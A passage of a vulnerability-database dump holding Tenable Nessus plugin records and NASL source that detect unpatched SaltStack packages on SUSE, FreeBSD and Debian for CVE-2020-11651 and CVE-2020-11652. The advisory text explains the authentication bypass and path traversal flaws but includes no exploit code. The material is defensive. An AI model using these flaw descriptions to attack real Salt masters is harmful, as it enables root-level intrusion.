script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python2-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python3-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-api-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-cloud-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-doc-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-master-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-minion-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-proxy-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-ssh-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-standalone-formulas-configuration-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-syndic-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python2-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python3-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-doc-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-minion-2019.2.0-6.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:13:44", "description": "F-Secure reports : CVE-2020-11651 - Authentication bypass vulnerabilities The ClearFuncs class processes unauthenticated requests and unintentionally exposes the _send_pub() method, which can be used to queue messages directly on the master publish server. Such messages can be used to trigger minions to run arbitrary commands as root.\n\nThe ClearFuncs class also exposes the method _prep_auth_info(), which returns the 'root key' used to authenticate commands from the local root user on the master server. This 'root key' can then be used to remotely call administrative commands on the master server. This unintentional exposure provides a remote un-authenticated attacker with root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities The wheel module contains commands used to read and write files under specific directory paths. The inputs to these functions are concatenated with the target directory and the resulting path is not canonicalized, leading to an escape of the intended path restriction.\n\nThe get_token() method of the salt.tokens.localfs class (which is exposed to unauthenticated requests by the ClearFuncs class) fails to sanitize the token input parameter which is then used as a filename, allowing insertion of '..' path elements and thus reading of files outside of the intended directory. The only restriction is that the file has to be deserializable by salt.payload.Serial.loads().", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "FreeBSD : salt -- multiple vulnerabilities in salt-master process (6bf55af9-973b-11ea-9f2c-38d547003487)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:py27-salt", "p-cpe:/a:freebsd:freebsd:py32-salt", "p-cpe:/a:freebsd:freebsd:py33-salt", "p-cpe:/a:freebsd:freebsd:py34-salt", "p-cpe:/a:freebsd:freebsd:py35-salt", "p-cpe:/a:freebsd:freebsd:py36-salt", "p-cpe:/a:freebsd:freebsd:py37-salt", "p-cpe:/a:freebsd:freebsd:py38-salt", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_6BF55AF9973B11EA9F2C38D547003487.NASL", "href": "https://www.tenable.com/plugins/nessus/136687", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136687);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"FreeBSD : salt -- multiple vulnerabilities in salt-master process (6bf55af9-973b-11ea-9f2c-38d547003487)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"F-Secure reports : CVE-2020-11651 - Authentication bypass\nvulnerabilities The ClearFuncs class processes unauthenticated\nrequests and unintentionally exposes the _send_pub() method, which can\nbe used to queue messages directly on the master publish server. Such\nmessages can be used to trigger minions to run arbitrary commands as\nroot.\n\nThe ClearFuncs class also exposes the method _prep_auth_info(), which\nreturns the 'root key' used to authenticate commands from the local\nroot user on the master server. This 'root key' can then be used to\nremotely call administrative commands on the master server. This\nunintentional exposure provides a remote un-authenticated attacker\nwith root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities The wheel module\ncontains commands used to read and write files under specific\ndirectory paths. The inputs to these functions are concatenated with\nthe target directory and the resulting path is not canonicalized,\nleading to an escape of the intended path restriction.\n\nThe get_token() method of the salt.tokens.localfs class (which is\nexposed to unauthenticated requests by the ClearFuncs class) fails to\nsanitize the token input parameter which is then used as a filename,\nallowing insertion of '..' path elements and thus reading of files\noutside of the intended directory. The only restriction is that the\nfile has to be deserializable by salt.payload.Serial.loads().\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://labs.f-secure.com/advisories/saltstack-authorization-bypass\");\n # https://blog.f-secure.com/new-vulnerabilities-make-exposed-salt-hosts-easy-targets/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f051ee1b\");\n # https://www.tenable.com/blog/cve-2020-11651-cve-2020-11652-critical-salt-framework-vulnerabilities-exploited-in-the-wild\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4975c617\");\n # https://vuxml.freebsd.org/freebsd/6bf55af9-973b-11ea-9f2c-38d547003487.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d05a29b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py27-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py32-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py33-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py34-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py35-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py36-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py37-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py38-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"py27-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py27-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py32-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py32-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py33-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py33-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py34-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py34-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py35-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py35-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py36-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py36-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py37-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py37-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py38-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py38-salt>=3000<3000.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:12:38", "description": "Several vulnerabilities were discovered in salt, a powerful remote execution manager, which could result in retrieve of user tokens from the salt master, execution of arbitrary commands on salt minions, arbitrary directory access to authenticated users or arbitrary code execution on salt-api hosts.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-07T00:00:00", "type": "nessus", "title": "Debian DSA-4676-1 : salt - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17361", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:salt", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4676.NASL", "href": "https://www.tenable.com/plugins/nessus/136372", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4676. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136372);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-17361\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"DSA\", value:\"4676\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Debian DSA-4676-1 : salt - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=949222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=959684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/salt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/salt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/salt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4676\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the salt packages.\n\nFor the oldstable distribution (stretch), these problems have been\nfixed in version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 2018.3.4+dfsg1-6+deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"salt-api\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-cloud\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-common\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-doc\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-master\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-minion\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-proxy\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-ssh\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-syndic\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-api\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-cloud\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-common\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-doc\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-master\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-minion\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-proxy\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-ssh\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-syndic\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:16:43", "description": "This update fixes the following issues :\n\nsalt :\n\nFix for TypeError in Tornado importer (bsc#1174165)\n\nRequire python3-distro only for TW (bsc#1173072)\n\nVarious virt backports from 3000.2\n\nAvoid traceback on debug logging for swarm module (bsc#1172075)\n\nAdd publish_batch to ClearFuncs exposed methods\n\nUpdate to salt version 3000 See release notes:\nhttps://docs.saltstack.com/en/latest/topics/releases/3000.html\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nTestsuite fix\n\nAdd option to enable/disable force refresh for zypper\n\nPython3.8 compatibility changes\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions because of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load managing SSH minions (bsc#1169604)\n\nRevert broken changes to slspath made on Salt 3000 (saltstack/salt#56341) (bsc#1170104)\n\nReturns a the list of IPs filtered by the optional network list\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nDo not require vendored backports-abc (bsc#1170288)\n\nFix partition.mkpart to work without fstype (bsc#1169800)\n\nEnable building and installation for Fedora\n\nDisable python2 build on Tumbleweed We are removing the python2 interpreter from openSUSE (SLE16). As such disable salt building for python2 there.\n\nMore robust remote port detection\n\nSanitize grains loaded from roster_grains.json cache during 'state.pkg'\n\nDo not make file.recurse state to fail when msgpack 0.5.4 (bsc#1167437)\n\nBuild: Buildequire pkgconfig(systemd) instead of systemd pkgconfig(systemd) is provided by systemd, so this is de-facto no change. But inside the Open Build Service (OBS), the same symbol is also provided by systemd-mini, which exists to shorten build-chains by only enabling what other packages need to successfully build\n\nAdd new custom SUSE capability for saltutil state module\n\nFixes status attribute issue in aptpkg test\n\nMake setup.py script not to require setuptools greater than 9.1\n\nLoop: fix variable names for until_no_eval\n\nDrop conflictive module.run state patch (bsc#1167437)\n\nUpdate patches after rebase with upstream v3000 tag (bsc#1167437)\n\nFix some requirements issues depending on Python3 versions\n\nRemoves obsolete patch\n\nFix for low rpm_lowpkg unit test\n\nAdd python-singledispatch as dependency for python2-salt\n\nVirt._get_domain: don't raise an exception if there is no VM\n\nFix for temp folder definition in loader unit test\n\nAdds test for zypper abbreviation fix\n\nImproved storage pool or network handling\n\nBetter import cache handline\n\nMake 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python 2\n\nFix regression in service states with reload argument\n\nFix integration test failure for test_mod_del_repo_multiline_values\n\nFix for unless requisite when pip is not installed\n\nFix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation\n\nFix tornado imports and missing _utils after rebasing patches\n\nRemoves unresolved merge conflict in yumpkg module\n\nUse full option name instead of undocumented abbreviation for zypper\n\nRequiring python3-distro only for openSUSE/SLE >= 15 and not for Python 2 builds\n\nAvoid possible user escalation upgrading salt-master (bsc#1157465) (CVE-2019-18897)\n\nFix unit tests failures in test_batch_async tests\n\nBatch Async: Handle exceptions, properly unregister and close instances after running async batching to avoid CPU starvation of the MWorkers (bsc#1162327)\n\nRHEL/CentOS 8 uses platform-python instead of python3\n\nLoader: invalidate the import cachefor extra modules\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nImprovements for chroot module\n\nAdd option to enable/disable force refresh for zypper\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions because of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load managing SSH minions (bsc#1169604)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-21T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : Salt 